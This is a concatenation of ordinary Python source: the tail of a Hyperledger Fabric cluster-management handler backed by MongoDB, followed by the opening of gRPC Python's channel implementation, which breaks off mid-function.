:param col_name: Use data in which col_name
:return: list of serialized doc
"""
result = []
if col_name == "active":
logger.debug("List all active clusters")
result = list(map(self._serialize, self.col_active.find(
filter_data)))
elif col_name == "released":
logger.debug("List all released clusters")
result = list(map(self._serialize, self.col_released.find(
filter_data)))
else:
logger.warning("Unknown cluster col_name=" + col_name)
return result
def get_by_id(self, id, col_name="active"):
""" Get a cluster for the external request
:param id: id of the doc
:param col_name: collection to check
:return: serialized result or obj
"""
if col_name != "released":
# logger.debug("Get a cluster with id=" + id)
cluster = self.col_active.find_one({"id": id})
else:
# logger.debug("Get a released cluster with id=" + id)
cluster = self.col_released.find_one({"id": id})
if not cluster:
logger.warning("No cluster found with id=" + id)
return {}
return self._serialize(cluster)
def create(self, name, host_id, config, start_port=0,
user_id=""):
""" Create a cluster based on given data
TODO: maybe need other id generation mechanism
Args:
name: name of the cluster
host_id: id of the host URL
config: network configuration
start_port: first service port for cluster, will generate
if not given
user_id: user_id of the cluster if start to be applied
return: Id of the created cluster or None
"""
logger.info("Create cluster {}, host_id={}, config={}, start_port={}, "
"user_id={}".format(name, host_id, config.get_data(),
start_port, user_id))
worker = self.host_handler.get_active_host_by_id(host_id)
if not worker:
return None
if len(worker.get("clusters")) >= worker.get("capacity"):
logger.warning("host {} is already full".format(host_id))
return None
worker_api = worker.get("worker_api")
logger.debug("worker_api={}".format(worker_api))
if start_port <= 0:
ports = self.find_free_start_ports(host_id, 1)
if not ports:
logger.warning("No free port is found")
return None
start_port = ports[0]
peer_mapped_ports, ca_mapped_ports, mapped_ports = {}, {}, {}
for k, v in PEER_SERVICE_PORTS.items():
peer_mapped_ports[k] = v - PEER_SERVICE_PORTS['rest'] + start_port
for k, v in CA_SERVICE_PORTS.items():
ca_mapped_ports[k] = v - PEER_SERVICE_PORTS['rest'] + start_port
mapped_ports.update(peer_mapped_ports)
mapped_ports.update(ca_mapped_ports)
logger.debug("mapped_ports={}".format(mapped_ports))
network_type = config['network_type']
net = { # net is a blockchain network instance
'id': '',
'name': name,
'user_id': user_id or SYS_CREATOR, # avoid applied
'host_id': host_id,
'worker_api': worker_api,
'network_type': network_type, # e.g., fabric-1.0
'create_ts': datetime.datetime.now(),
'apply_ts': '',
'release_ts': '',
'status': 'running',
'containers': [],
'duration': '',
'health': ''
}
if network_type == NETWORK_TYPE_FABRIC_V1: # TODO: fabric v1.0
net.update({
'mapped_ports': mapped_ports,
'service_url': {}, # e.g., {rest: xxx:7050, grpc: xxx:7051}
})
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1: # fabric v0.6
net.update({
'mapped_ports': mapped_ports,
'service_url': {}, # e.g., {rest: xxx:7050, grpc: xxx:7051}
})
net.update(config.get_data())
uuid = self.col_active.insert_one(net).inserted_id # object type
cid = str(uuid)
self.col_active.update_one({"_id": uuid}, {"$set": {"id": cid}})
# try to start one cluster at the host
worker = self.host_handler.db_update_one(
{"id": host_id}, {"$addToSet": {"clusters": cid}})
if not worker or len(worker.get("clusters")) > worker.get("capacity"):
self.col_active.delete_one({"id": cid})
self.host_handler.db_update_one({"id": host_id},
{"$pull": {"clusters": cid}})
return None
# from now on, we should be safe
# start compose project, failed then clean and return
logger.debug("Start compose project with name={}".format(cid))
containers = self.cluster_agents[worker.get('type')]\
.create(cid, mapped_ports, worker, config=config, user_id=user_id)
if not containers:
logger.warning("failed to start cluster={}, then delete"
.format(name))
self.delete(id=cid, record=False, forced=True)
return None
access_peer, access_ca = '', ''
if network_type == NETWORK_TYPE_FABRIC_V1: # fabric v1.0
access_peer = 'peer0.org1.example.com'
access_ca = 'ca.example.com'
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1: # fabric v0.6
access_peer = 'vp0'
access_ca = 'membersrvc'
peer_host_ip = self._get_service_ip(cid, access_peer)
ca_host_ip = self._get_service_ip(cid, access_ca)
# no api_url, then clean and return
if not peer_host_ip: # not valid api_url
logger.error("Error to find peer host url, cleanup")
self.delete(id=cid, record=False, forced=True)
return None
service_urls = {}
for k, v in peer_mapped_ports.items():
service_urls[k] = "{}:{}".format(peer_host_ip, v)
for k, v in ca_mapped_ports.items():
service_urls[k] = "{}:{}".format(ca_host_ip, v)
# update api_url, container, and user_id field
self.db_update_one(
{"id": cid},
{"$set": {"containers": containers, "user_id": user_id,
'api_url': service_urls['rest'],
'service_url': service_urls}})
def check_health_work(cid):
time.sleep(5)
self.refresh_health(cid)
t = Thread(target=check_health_work, args=(cid,))
t.start()
logger.info("Create cluster OK, id={}".format(cid))
return cid
def delete(self, id, record=False, forced=False):
""" Delete a cluster instance
Clean containers, remove db entry. Only operate on active host.
:param id: id of the cluster to delete
:param record: Whether to record into the released collections
:param forced: Whether to removing user-using cluster, for release
:return:
"""
logger.debug("Delete cluster: id={}, forced={}".format(id, forced))
c = self.db_update_one({"id": id}, {"$set": {"user_id": SYS_DELETER}},
after=False)
if not c:
logger.warning("Cannot find cluster {}".format(id))
return False
# we are safe from occasional applying now
user_id = c.get("user_id") # original user_id
if not forced and user_id != "" and not user_id.startswith(SYS_USER):
# not forced, and chain is used by normal user, then no process
logger.warning("Cannot delete cluster {} by "
"user {}".format(id, user_id))
self.col_active.update_one({"id": id},
{"$set": {"user_id": user_id}})
return False
# 0. forced
# 1. user_id == SYS_DELETER or ""
# Then, add deleting flag to the db, and start deleting
if not user_id.startswith(SYS_DELETER):
self.col_active.update_one(
{"id": id},
{"$set": {"user_id": SYS_DELETER + user_id}})
host_id, worker_api, network_type, consensus_plugin, cluster_size = \
c.get("host_id"), c.get("worker_api"), \
c.get("network_type", NETWORK_TYPE_FABRIC_PRE_V1), \
c.get("consensus_plugin", CONSENSUS_PLUGINS_FABRIC_V1[0]), \
c.get("size", NETWORK_SIZE_FABRIC_PRE_V1[0])
# port = api_url.split(":")[-1] or CLUSTER_PORT_START
h = self.host_handler.get_active_host_by_id(host_id)
if not h:
logger.warning("Host {} inactive".format(host_id))
self.col_active.update_one({"id": id},
{"$set": {"user_id": user_id}})
return False
if network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(consensus_plugin=consensus_plugin,
size=cluster_size)
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(consensus_plugin=consensus_plugin,
consensus_mode='',
size=cluster_size)
else:
return False
if not self.cluster_agents[h.get('type')].delete(id, worker_api,
config):
logger.warning("Error to run compose clean work")
self.col_active.update_one({"id": id},
{"$set": {"user_id": user_id}})
return False
self.host_handler.db_update_one({"id": c.get("host_id")},
{"$pull": {"clusters": id}})
self.col_active.delete_one({"id": id})
if record: # record original c into release collection
logger.debug("Record the cluster info into released collection")
c["release_ts"] = datetime.datetime.now()
c["duration"] = str(c["release_ts"] - c["apply_ts"])
# seems mongo reject timedelta type
if user_id.startswith(SYS_DELETER):
c["user_id"] = user_id[len(SYS_DELETER):]
self.col_released.insert_one(c)
return True
def delete_released(self, id):
""" Delete a released cluster record from db
:param id: id of the cluster to delete
:return: True or False
"""
logger.debug("Delete cluster: id={} from release records.".format(id))
self.col_released.find_one_and_delete({"id": id})
return True
def apply_cluster(self, user_id, condition={}, allow_multiple=False):
""" Apply a cluster for a user
:param user_id: which user will apply the cluster
:param condition: the filter to select
:param allow_multiple: Allow multiple chain for each tenant
:return: serialized cluster or None
"""
if not allow_multiple: # check if already having one
filt = {"user_id": user_id, "release_ts": "", "health": "OK"}
filt.update(condition)
c = self.col_active.find_one(filt)
if c:
logger.debug("Already assigned cluster for " + user_id)
return self._serialize(c)
logger.debug("Try find available cluster for " + user_id)
hosts = self.host_handler.list({"status": "active",
"schedulable": "true"})
host_ids = [h.get("id") for h in hosts]
logger.debug("Find active and schedulable hosts={}".format(host_ids))
for h_id in host_ids: # check each active and schedulable host
filt = {"user_id": "", "host_id": h_id, "health": "OK"}
filt.update(condition)
c = self.db_update_one(
filt,
{"$set": {"user_id": user_id,
"apply_ts": datetime.datetime.now()}})
if c and c.get("user_id") == user_id:
logger.info("Now have cluster {} at {} for user {}".format(
c.get("id"), h_id, user_id))
return self._serialize(c)
logger.warning("Not find matched available cluster for " + user_id)
return {}
def release_cluster_for_user(self, user_id):
""" Release all cluster for a user_id.
:param user_id: which user
:return: True or False
"""
logger.debug("release clusters for user_id={}".format(user_id))
c = self.col_active.find({"user_id": user_id, "release_ts": ""})
cluster_ids = list(map(lambda x: x.get("id"), c))
logger.debug("clusters for user {}={}".format(user_id, cluster_ids))
result = True
for cid in cluster_ids:
result = result and self.release_cluster(cid)
return result
def release_cluster(self, cluster_id, record=True):
""" Release a specific cluster.
Release means delete and try best to recreate it with same config.
:param cluster_id: specific cluster to release
:param record: Whether to record this cluster to release table
:return: True or False
"""
c = self.db_update_one(
{"id": cluster_id},
{"$set": {"release_ts": datetime.datetime.now()}})
if not c:
logger.warning("No cluster find for released with id {}".format(
cluster_id))
return True
if not c.get("release_ts"): # not have one
logger.warning("No cluster can be released for id {}".format(
cluster_id))
return False
return self.reset(cluster_id, record)
def start(self, cluster_id):
"""Start a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
result = self.cluster_agents[h.get('type')].start(
name=cluster_id, worker_api=h.get('worker_api'),
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.get('log_type'),
log_level=h.get('log_level'),
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{"$set": {'status': 'running'}})
return True
else:
return False
def restart(self, cluster_id):
"""Restart a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
result = self.cluster_agents[h.get('type')].restart(
name=cluster_id, worker_api=h.get('worker_api'),
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.get('log_type'),
log_level=h.get('log_level'),
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{"$set": {'status': 'running'}})
return True
else:
return False
def stop(self, cluster_id):
"""Stop a cluster
:param cluster_id: id of cluster to stop
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
result = self.cluster_agents[h.get('type')].stop(
name=cluster_id, worker_api=h.get('worker_api'),
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.get('log_type'),
log_level=h.get('log_level'),
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{"$set": {'status': 'stopped', 'health': ''}})
return True
else:
return False
def reset(self, cluster_id, record=False):
"""
Force to reset a chain.
Delete it and recreate with the same configuration.
:param cluster_id: id of the reset cluster
:param record: whether to record into released db
:return:
"""
c = self.get_by_id(cluster_id)
logger.debug("Run recreate_work in background thread")
        cluster_name, host_id, mapped_ports, network_type = \
            c.get("name"), c.get("host_id"), \
            c.get("mapped_ports"), c.get("network_type")
if not self.delete(cluster_id, record=record, forced=True):
logger.warning("Delete cluster failed with id=" + cluster_id)
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
else:
return False
if not self.create(name=cluster_name, host_id=host_id,
start_port=mapped_ports['rest'], config=config):
logger.warning("Fail to recreate cluster {}".format(cluster_name))
return False
return True
def reset_free_one(self, cluster_id):
"""
Reset some free chain, mostly because it's broken.
:param cluster_id: id to reset
:return: True or False
"""
logger.debug("Try reseting cluster {}".format(cluster_id))
c = self.db_update_one({"id": cluster_id, "user_id": ""},
{"$set": {"user_id": SYS_RESETTING}})
if c.get("user_id") != SYS_RESETTING: # not have one
logger.warning("No free cluster can be reset for id {}".format(
cluster_id))
return False
return self.reset(cluster_id)
def _serialize(self, doc, keys=('id', 'name', 'user_id', 'host_id',
'network_type',
'consensus_plugin',
'consensus_mode', 'worker_api',
'create_ts', 'apply_ts', 'release_ts',
'duration', 'containers', 'size', 'status',
'health', 'mapped_ports', 'service_url')):
""" Serialize an obj
:param doc: doc to serialize
:param keys: filter which key in the results
:return: serialized obj
"""
result = {}
if doc:
for k in keys:
result[k] = doc.get(k, '')
return result
def _get_service_ip(self, cluster_id, node='vp0'):
"""
:param cluster_id: The name of the cluster
:param host: On which host to search the cluster
:param node: name of the cluster node
:return: service IP or ""
"""
host_id = self.get_by_id(cluster_id).get("host_id")
host = self.host_handler.get_by_id(host_id)
if not host:
logger.warning("No host found with cluster {}".format(cluster_id))
return ""
worker_api, host_type = host.get('worker_api'), host.get('type')
if host_type not in WORKER_TYPES:
logger.warning("Found invalid host_type=%s".format(host_type))
return ""
# we should diff with simple host and swarm host here
if host_type == WORKER_TYPE_DOCKER: # single
segs = worker_api.split(":") # tcp://x.x.x.x:2375
if len(segs) != 3:
logger.error("Invalid daemon url = ", worker_api)
return ""
host_ip = segs[1][2:]
logger.debug("single host, ip = {}".format(host_ip))
elif host_type == WORKER_TYPE_SWARM: # swarm
host_ip = get_swarm_node_ip(worker_api, "{}_{}".format(
cluster_id, node))
logger.debug("swarm host, ip = {}".format(host_ip))
else:
logger.error("Unknown host type = {}".format(host_type))
host_ip = ""
return host_ip
def find_free_start_ports(self, host_id, number):
""" Find the first available port for a new cluster api
This is NOT lock-free. Should keep simple, fast and safe!
Check existing cluster records in the host, find available one.
:param host_id: id of the host
:param number: Number of ports to get
:return: The port list, e.g., [7050, 7150, ...]
"""
logger.debug("Find {} start ports for host {}".format(number, host_id))
if number <= 0:
logger.warning("number {} <= 0".format(number))
return []
        if not self.host_handler.get_by_id(host_id):
            logger.warning("Cannot find host with id={}".format(host_id))
            return []
clusters_exists = self.col_active.find({"host_id": host_id})
clusters_valid = list(filter(lambda c: c.get("service_url"),
clusters_exists))
ports_existed = list(map(
lambda c: int(c["service_url"]["rest"].split(":")[-1]),
clusters_valid))
logger.debug("The ports existed: {}".format(ports_existed))
if len(ports_existed) + number >= 1000:
logger.warning("Too much ports are already in used.")
return []
candidates = [CLUSTER_PORT_START + i * CLUSTER_PORT_STEP
for i in range(len(ports_existed) + number)]
result = list(filter(lambda x: x not in ports_existed, candidates))
logger.debug("Free ports are {}".format(result[:number]))
return result[:number]
def refresh_health(self, cluster_id, timeout=5):
"""
Check if the cluster is healthy by comparing its peer count with the expected size
:param cluster_id: id of the cluster
:param timeout: how many seconds to wait for a response
:return: True or False
"""
cluster = self.get_by_id(cluster_id)
logger.debug("checking health of cluster={}".format(cluster))
if not cluster:
logger.warning("Cannot found cluster id={}".format(cluster_id))
return True
if cluster.get('status') != 'running':
logger.warning("cluster is not running id={}".format(cluster_id))
return True
if cluster.get('network_type') == NETWORK_TYPE_FABRIC_PRE_V1:
rest_api = cluster["service_url"]['rest'] + "/network/peers"
if not rest_api.startswith('http'):
rest_api = 'http://' + rest_api
try:
r = requests.get(rest_api, timeout=timeout)
except Exception as e:
logger.error("Error to refresh health of cluster {}: {}".
format(cluster_id, e))
return True
peers = r.json().get("peers")
if len(peers) == cluster["size"]:
self.db_update_one({"id": cluster_id},
{"$set": {"health": "OK"}})
return True
else:
logger.debug("checking result of cluster id={}".format(
cluster_id, peers))
self.db_update_one({"id": cluster_id},
{"$set": {"health": "FAIL"}})
return False
elif cluster.get('network_type') == NETWORK_TYPE_FABRIC_V1:
# TODO: check fabric 1.0 network health status
return True
return True
def db_update_one(self, filter, operations, after=True, col="active"):
"""
Update the data into the active db
:param filter: Which instance to update, e.g., {"id": "xxx"}
:param operations: data to update to db, e.g., {"$set": {}}
:param after: return AFTER or BEFORE
:param col: collection to operate on
:return: The updated host json dict
"""
if after:
return_type = ReturnDocument.AFTER
else:
return_type = ReturnDocument.BEFORE
if col == "active":
doc = self.col_active.find_one_and_update(
filter, operations, return_document=return_type)
else:
doc = self.col_released.find_one_and_update(
filter, operations, return_document=return_type)
return self._serialize(doc)
cluster_handler = ClusterHandler()
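# A minimal, self-contained sketch of the candidate-and-filter port search used
# in find_free_start_ports above: generate CLUSTER_PORT_START + i * CLUSTER_PORT_STEP
# candidates, then drop the ports already recorded in the clusters' service_url
# fields. The start/step values below are assumptions for illustration, not the
# module's real constants.
def _example_find_free_start_ports(ports_existed, number,
                                   port_start=7050, port_step=100):
    """Sketch of the candidate-and-filter port search used above."""
    if number <= 0:
        return []
    # Generate enough candidates that, even if every existing port collides,
    # at least ``number`` free ones remain.
    candidates = [port_start + i * port_step
                  for i in range(len(ports_existed) + number)]
    free = [p for p in candidates if p not in ports_existed]
    return free[:number]
# Example: with 7050 and 7250 taken, the next two free start ports are
# 7150 and 7350 under the assumed start/step values.
assert _example_find_free_start_ports([7050, 7250], 2) == [7150, 7350]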
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
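# _Rendezvous implements grpc.Future and grpc.Call, so the object returned by
# the future() method of the multi-callables defined further below supports
# result(), add_done_callback() and code(). A hedged usage sketch against the
# public grpc API; the target, method path and payload are illustrative
# assumptions only.
def _example_future_usage(target='localhost:50051'):
    """Sketch of consuming a unary-unary RPC through its Future interface."""
    channel = grpc.insecure_channel(target)
    multicallable = channel.unary_unary(
        '/example.Echo/Ping',  # hypothetical method path
        request_serializer=lambda x: x,  # keep payloads as raw bytes
        response_deserializer=lambda x: x)
    future = multicallable.future(b'ping', timeout=5)
    # The done callback receives the _Rendezvous itself once the RPC finishes.
    future.add_done_callback(lambda rendezvous: print(rendezvous.code()))
    try:
        return future.result()  # blocks until the response or an error arrives
    except grpc.RpcError as rpc_error:
        return rpc_error.code()
    finally:
        channel.close()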
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
